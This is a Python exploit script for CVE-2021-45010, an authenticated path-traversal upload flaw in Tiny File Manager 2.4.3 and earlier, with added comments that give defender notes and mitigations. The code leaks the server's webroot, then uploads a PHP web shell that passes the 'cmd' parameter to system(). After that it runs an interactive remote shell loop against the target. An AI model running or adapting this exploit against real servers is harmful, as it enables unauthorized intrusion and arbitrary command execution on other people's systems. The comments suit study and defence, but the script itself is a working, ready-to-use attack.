# Exploit Title: Tiny File Manager <= 2.4.3 Remote Code Execution (Authenticated)
# Date: 14/03/2022
# Exploit Author: FEBIN MON SAJI
# Vendor Home Page: https://tinyfilemanager.github.io/
# Software Link: https://github.com/prasathmani/tinyfilemanager
# Version: Tiny File Manager <= 2.4.3
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-45010
# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
# Vulnerability Description: A path traversal vulnerability in the file upload functionality of tinyfilemanager.php in Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server.
import os
import requests
import sys
import random
import readline
def banner():
    """Print the identification banner: the CVE id, affected product and author credits."""
    banner_lines = (
        "",
        "CVE-2021-45010: Tiny File Manager <= 2.4.3 Authenticated RCE Exploit.",
        "Vulnerability discovered by Febin",
        "Exploit Author: FEBIN",
        "",
    )
    # Joining with newlines reproduces the leading and trailing blank line of the banner.
    print("\n".join(banner_lines))
def help():
    """Print the command-line usage text, substituting the invoked script name."""
    script_name = sys.argv[0]
    usage_text = (
        f"\npython3 {script_name} <URL> <Admin Username> <Password>\n"
        f"Example: python3 {script_name} http://files.ubuntu.local/index.php admin admin@123\n"
    )
    print(usage_text)
# Script body: proof of concept for the authenticated upload path traversal
# described in the file header (CVE-2021-45010).
#
# NOTE(review): the listing lost its indentation; the nesting below is
# reconstructed from how the if/else/try/except keywords pair up.
#
# Defender summary of what the requests below look like on the wire:
#   * every request carries the same fixed session cookie value and the same
#     Firefox 91 User-Agent string;
#   * a POST to "?p=&upload" with an "uploadurl" pointing at a non-existent host;
#   * an upload POST whose "fullpath" form field starts with a run of "../";
#   * a new "pwn_<integer>.php" file in the webroot, then requests to it that
#     carry a "cmd" parameter.
# Mitigations: run a release newer than the affected range in the file header,
# reject ".." in upload paths server-side, do not serve PHP from directories
# the file manager can write to, and restrict who can reach the login page.
banner()
if len(sys.argv) == 4:
    # Only URLs starting with "http://" pass this check; anything else
    # (including https://) reaches the "doesn't seem like a URL" branch.
    if sys.argv[1].startswith("http://"):
        try:
            # Log in with the supplied account. The script supplies its own
            # session cookie value and reuses it on later requests (presumably
            # relying on the server accepting a client-chosen session id).
            creds = {"fm_usr":f"{str(sys.argv[2])}","fm_pwd":f"{str(sys.argv[3])}"}
            header={"Cookie":"filemanager=abcdefghijklmnopqrstuvwzxz","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}
            # The login response is stored but never inspected, so a failed
            # login is not detected at this point.
            req=requests.post(str(sys.argv[1]), data=creds, headers=header)
            cookie="filemanager=abcdefghijklmnopqrstuvwzxz"
            header1 = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","Cookie":"filemanager=abcdefghijklmnopqrstuvwzxz","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}
            # Information disclosure step: an upload-from-URL request naming a
            # host that does not exist; the "fail" -> "file" field of the reply
            # is then read as an absolute server-side path.
            print("[+] Leak in the webroot direcory path to upload shell.")
            payload={"type":"upload","uploadurl":"http://sjlkjnaljsnkjsnlakjsnakjs.dhdhdhdhllk/","ajax":"true"}
            leak=requests.post(str(sys.argv[1])+"?p=&upload", data=payload, headers=header1)
            # NOTE(review): eval() runs the HTTP response body as a Python
            # expression on the machine running this script. A hostile or
            # compromised server can therefore execute code in the tester's
            # environment; the reply should be parsed with json.loads() instead.
            error_msg = eval(leak.text.replace("\\",""))
            path=error_msg["fail"]["file"]
            # Drop the last path component and rebuild the directory path; the
            # empty string removed here is the one produced by the leading "/".
            dir_path=path.split("/")[:-1]
            dir_path.remove("")
            fullpath=""
            for i in dir_path:
                append = "/"+i
                fullpath+=append
            print("[+] WEBROOT found: ",fullpath)
            # File name is "pwn_" + the hash of a random float + ".php".
            filename = "pwn_" + str(hash(random.random())) + ".php"
            print(f"[+] Trying to upload {filename} to {fullpath} directory...")
            # The traversal itself: the "fullpath" field is prefixed with "../"
            # segments followed by the leaked absolute directory. A server that
            # rejects ".." in this field is not affected by this request.
            datas={"p":"","fullpath":f"../../../../../../../{fullpath}/{filename}"}
            # Uploaded content is a PHP one-liner that hands the "cmd" request
            # parameter to system().
            files={"file":("feb.php","<?php system($_REQUEST['cmd']); ?>","application/x-php")}
            header={"Cookie":cookie,"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}
            upload=requests.post(sys.argv[1],data=datas, files=files, headers=header)
            print(upload.text)
            # NOTE(review): second eval() of a server response; same risk to
            # the operator as above, and json.loads() is the safe parser.
            success=eval(upload.text)
            # Host is the URL with "http://" stripped, up to the first "/". The
            # uploaded file is then requested at the site root, which assumes
            # the leaked directory is that host's document root.
            host=str(sys.argv[1]).replace("http://","").split("/")[0]
            if success["info"] == "file upload successful":
                print("[+] Got Success response. Files seems to be uploaded successfully.")
                print(f"[+] Try to access the shell at {'http://'+host+'/'+filename}")
                shell=requests.get('http://'+host+'/'+filename)
                if shell.status_code == 200:
                    print(f"[+]Shell Found {'http://'+host+'/'+filename}.")
                    print("")
                    print("'exit' to quit from shell.")
                    print("")
                    # Interactive loop: each input line is sent as the "cmd"
                    # parameter of a POST to the uploaded file.
                    while True:
                        cnc = input("sh31l$> ")
                        if cnc == "exit" or cnc == "quit":
                            print("[+] Attempting to cleanup...")
                            # Cleanup sends "rm -f" for the uploaded file, but
                            # the response is not checked. If the request fails
                            # the file stays in the webroot, so removal has to
                            # be verified separately.
                            cleanup = requests.post('http://'+host+'/'+filename,data={"cmd":f"rm -f {fullpath}/{filename}"})
                            sys.exit()
                        else:
                            cmd = {"cmd":str(cnc)}
                            execute = requests.post('http://'+host+'/'+filename, data=cmd)
                            print(execute.text)
                else:
                    # The uploaded file did not answer with HTTP 200.
                    print("[-] File not uploaded...")
                    sys.exit()
            else:
                print("[-] No Success response. Files does not seem to be uploaded successfully.")
                print("Exiting...")
                exit()
        except SystemExit:
            # sys.exit() and exit() above both raise SystemExit and end up here.
            print("Exited.")
        except:
            # NOTE(review): a bare except also catches KeyboardInterrupt and
            # hides the real error (bad credentials, unexpected response body,
            # missing "fail"/"info" keys) behind one generic message.
            print("Something went wrong! Valid URL? Lost Connectivity? User Interrupt(ctrl+c)?")
    else:
        print("That doesn't seem like a URL!")
else:
    # Wrong number of arguments: show usage.
    help()